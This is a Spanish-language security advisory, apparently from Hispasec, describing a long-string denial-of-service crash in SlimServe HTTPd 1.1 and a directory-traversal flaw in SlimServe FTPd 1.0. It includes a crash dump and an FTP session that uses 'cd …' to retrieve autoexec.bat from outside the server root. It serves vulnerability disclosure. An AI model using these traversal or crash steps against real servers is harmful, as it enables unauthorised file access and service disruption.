Dos vulnerabilidades que afectan a los servidores Web y Ftp de SlimServe
podrán permitir a un usuario malicioso la realización de un ataque de
denegación de servicios sobre el servidor Web y conseguir cualquier
archivo del servidor incluso sobrepasando la raíz en el servidor Ftp.
HTTPd v1.1 y FTPd v1.0 SlimServe son respectivamente un servidor web y
un servidor FTP para Microsoft Windows 95/98/NT 4.0 y 2000, que están
disponibles para su bajada en las direcciones http://www.whitsoftdev.com y
http://www.download.com.
El servidor web se ve afectado por un ataque por denegación de servicio,
por el cual un atacante puede enviar una petición al servidor con una
cadena de caracteres extremadamente larga. El atacante deberá enviar mas
de 80000 caracteres, con lo que conseguirá la caída del servidor.
En caso de denegación de servicio, la respuesta del servidor será:
SLIMHTTP caused an invalid page fault in
module SLIMHTTP.EXE at 017f:004021db.
Registers:
EAX=ffffffff CS=017f EIP=004021db EFLGS=00010286
EBX=00412678 SS=0187 ESP=00eafa1c EBP=000400a4
ECX=81726914 DS=0187 ESI=00eb0000 FS=3b57
EDX=8172691c ES=0187 EDI=00000068 GS=402e
Bytes at CS:EIP:
8a 06 3c 0d 75 05 c6 06 00 eb 04 3c 0a 74 1a 66
Stack dump:
00eafe99 00eafd5d 00000000 0000000f
00000000 00000001 00000068 00000000
00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000
La vulnerabilidad que afecta a FTPd en su versión 1.0 es mucho más grave
ya que permitirá a un atacante sobrepasar la raíz del servidor, lo que
permitirá obtener cualquier archivo del servidor. Para ello, bastará
realizar una escalada de directorios mediante rutas relativas (como «…»).
% ftp localhost
Connected to xxxxxxxxxx.com.
220-SlimServe FTPd 1.0 :: http://www.whitsoftdev.com.
220 127.0.0.1 connected to xxxxxxxxxx.com.
User (xxxxxxxxxx.com:(none)): anonymous
230 User anonymous logged in, proceed.
ftp> cd …
250 CWD command successful.
ftp> get autoexec.bat
200 PORT command successful.
150 Opening data connection for «/…/autoexec.bat».
250 RETR command successful.
ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.
ftp>
antonio_roman@hispasec.com
Más información:
Vulnerabilidad en SlimServe FTPd:
http://www.securityfocus.com/archive/1/165819
Escalada de directorios en SlimServe FTPd:
http://www.ntsecurity.net/Articles/Index.cfm?ArticleID=20168
Vulnerabilidad DOS en SlimServe HTTPd:
http://www.securityfocus.com/bid/2318
Deja una respuesta